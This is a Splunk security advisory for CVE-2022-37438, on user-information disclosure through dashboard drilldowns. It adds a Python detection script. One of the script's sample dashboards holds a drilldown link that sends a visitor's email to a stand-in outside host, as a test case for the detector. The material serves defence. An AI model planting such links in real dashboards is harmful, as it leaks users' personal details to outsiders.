Information disclosure via the dashboard drilldown in Splunk Enterprise

Advisory ID: SVD-2022-0802

CVE ID: CVE-2022-37438

Published: 2022-08-16

Last Update: 2022-08-16

CVSSv3.1 Score: 2.6, Low

CWE: CWE-200

Bug ID: SPL-221531

Description

In the Splunk Enterprise versions listed in the following table, an authenticated user can craft a dashboard that could leak information (for example, username, email, and real name) about Splunk users when another user visits it through the drilldown component. The vulnerability requires user access to create and share dashboards using Splunk Web.

Solution

For Splunk Enterprise, upgrade to version 8.1.11, 8.2.7.1, 9.0.1, or higher.

For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.

Product Status

| Product | Version | Component | Affected Version | Fix Version |
|---|---|---|---|---|
| Splunk Enterprise | 8.1 | Splunk Web | 8.1.10 and lower | 8.1.11 |
| Splunk Enterprise | 8.2 | Splunk Web | 8.2.0 to 8.2.7 | 8.2.7.1 |
| Splunk Enterprise | 9.0 | Splunk Web | 9.0.0 | 9.0.1 |
| Splunk Cloud Platform | | Splunk Web | 8.2.2203.4 and lower | 9.0.2205 |

Mitigations and Workarounds

You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.

Detections

This search uses REST functionality to query for dashboards with environment variables present in URL options that could potentially leak information about Splunk users. If an analyst sees results from this search, we suggest investigating to determine whether the disclosure of these environment variables was intended.
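The same check can be run offline against exported dashboard source. The following is an added example, not Splunk's detection search: it parses Simple XML and flags URL-bearing elements that embed `$env:...$` tokens. The function names, the sample dashboards, and the host `collector.example.invalid` are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# $env:name$ with an optional single-letter token filter such as |u or |s
ENV_TOKEN = re.compile(r"\$env:([A-Za-z_]+)(?:\|[a-z])?\$")
# Environment tokens carrying the user details named in the advisory
USER_TOKENS = {"user", "user_email", "user_realname"}

def scan_dashboard(name, xml_source):
    """Return findings for URL-bearing elements that embed $env:...$ tokens."""
    findings = []
    for elem in ET.fromstring(xml_source).iter():
        text = (elem.text or "").strip()
        opt_name = elem.get("name", "").lower()
        # Drilldown links, options named like a URL, or any text holding a URL
        is_url = elem.tag == "link" or "url" in opt_name or "://" in text
        tokens = sorted(set(ENV_TOKEN.findall(text)))
        if is_url and tokens:
            findings.append({
                "dashboard": name,
                "element": elem.tag,
                "tokens": tokens,
                "user_data": bool(USER_TOKENS & set(tokens)),
            })
    return findings

# Constructed sample dashboards (not taken from any real deployment)
SAMPLES = {
    "ops_overview": """<dashboard><row><panel><table>
        <search><query>index=_internal | stats count by host</query></search>
        <drilldown><link target="_blank">/app/search/search?q=host=$click.value$</link></drilldown>
      </table></panel></row></dashboard>""",
    "shared_report": """<dashboard><row><panel><table>
        <search><query>index=_internal | stats count by sourcetype</query></search>
        <drilldown><link target="_blank">https://collector.example.invalid/r?who=$env:user_email|u$</link></drilldown>
      </table></panel></row></dashboard>""",
}

def scan_all(dashboards):
    """Scan a mapping of dashboard name -> Simple XML source."""
    results = []
    for name, source in dashboards.items():
        results.extend(scan_dashboard(name, source))
    return results

if __name__ == "__main__":
    for finding in scan_all(SAMPLES):
        print(finding)
```

A finding with `user_data` set to true deserves review first; tokens such as `$env:app$` in a URL are flagged too but do not expose user details.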

Severity

Splunk rates the severity as Low, 2.6, with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N. If the Splunk Enterprise instance has Splunk Web disabled, it is not impacted and the vulnerability is informational.

Acknowledgments

Eric LaMothe at Splunk